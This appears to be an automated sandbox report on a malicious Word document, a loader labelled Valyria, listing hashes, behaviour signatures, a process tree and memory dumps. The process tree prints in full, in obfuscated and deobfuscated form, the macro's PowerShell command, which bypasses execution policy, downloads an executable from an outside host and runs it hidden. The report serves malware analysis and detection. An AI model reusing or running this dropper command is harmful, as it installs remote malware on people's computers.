Analysis

  • max time kernel
    182s
  • max time network
    191s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220331-en
  • submitted
    08/04/2022, 01:41

General

  • Target

    0ae3f024befcb994e66993d755a5195b.doc

  • Size

    51KB

  • MD5

    0ae3f024befcb994e66993d755a5195b

  • SHA1

    51a2f146b3e574b6bdafceb1e5dffe10b4b5e5b8

  • SHA256

    f92087059144bdfd22bc76d34d247564fe05f54be5c8b3c95624d792645b33f1

  • SHA512

    b21e0ec0ded83a33c5c2063e7e377957dad47c14afb792541a2414b9e3e610a48a9a2ece0d3816e8cd83a42969500249d5ec5d89d68e58d6f90d55678db85a86

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.nnapoakea.top/read.php?f=0.dat

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Valyria

    Malicious Word document which is a loader for other malware.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0ae3f024befcb994e66993d755a5195b.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4136
    • C:\Windows\SYSTEM32\CMD.Exe
      CMD.Exe /C "POwERs^h^E^L^l.e^xe -EXeC^U^T^I^onpolicY^ ^B^YPa^ss^ ^-nO^PR^OfIlE ^-Wind^ow^StylE Hidd^e^N ^(ne^w-o^bj^ECT sYSTEM.NeT^.We^B^c^L^ie^nt).d^o^W^NlOAdfiLe('http://www.nnapoakea.top/read.php?f=0.dat','%APPdAta%.exe');^St^a^R^T-Pr^oCE^s^s^ '%ApPDaTA%.EXE'"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2864
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwERshELl.exe -EXeCUTIonpolicY BYPass -nOPROfIlE -WindowStylE HiddeN (new-objECT sYSTEM.NeT.WeBcLient).doWNlOAdfiLe('http://www.nnapoakea.top/read.php?f=0.dat','C:\Users\Admin\AppData\Roaming.exe');StaRT-ProCEss 'C:\Users\Admin\AppData\Roaming.EXE'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1236

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1236-131-0x000002BDA4BE0000-0x000002BDA4C02000-memory.dmp

    Filesize

    136KB

  • memory/1236-135-0x000002BDA4BD6000-0x000002BDA4BD8000-memory.dmp

    Filesize

    8KB

  • memory/1236-134-0x000002BDA4BD3000-0x000002BDA4BD5000-memory.dmp

    Filesize

    8KB

  • memory/1236-133-0x000002BDA4BD0000-0x000002BDA4BD2000-memory.dmp

    Filesize

    8KB

  • memory/1236-132-0x00007FF82DE60000-0x00007FF82E921000-memory.dmp

    Filesize

    10.8MB

  • memory/4136-128-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmp

    Filesize

    64KB

  • memory/4136-124-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmp

    Filesize

    64KB

  • memory/4136-127-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmp

    Filesize

    64KB

  • memory/4136-126-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmp

    Filesize

    64KB

  • memory/4136-125-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmp

    Filesize

    64KB

  • memory/4136-136-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmp

    Filesize

    64KB

  • memory/4136-137-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmp

    Filesize

    64KB

  • memory/4136-138-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmp

    Filesize

    64KB

  • memory/4136-139-0x00007FF819CD0000-0x00007FF819CE0000-memory.dmp

    Filesize

    64KB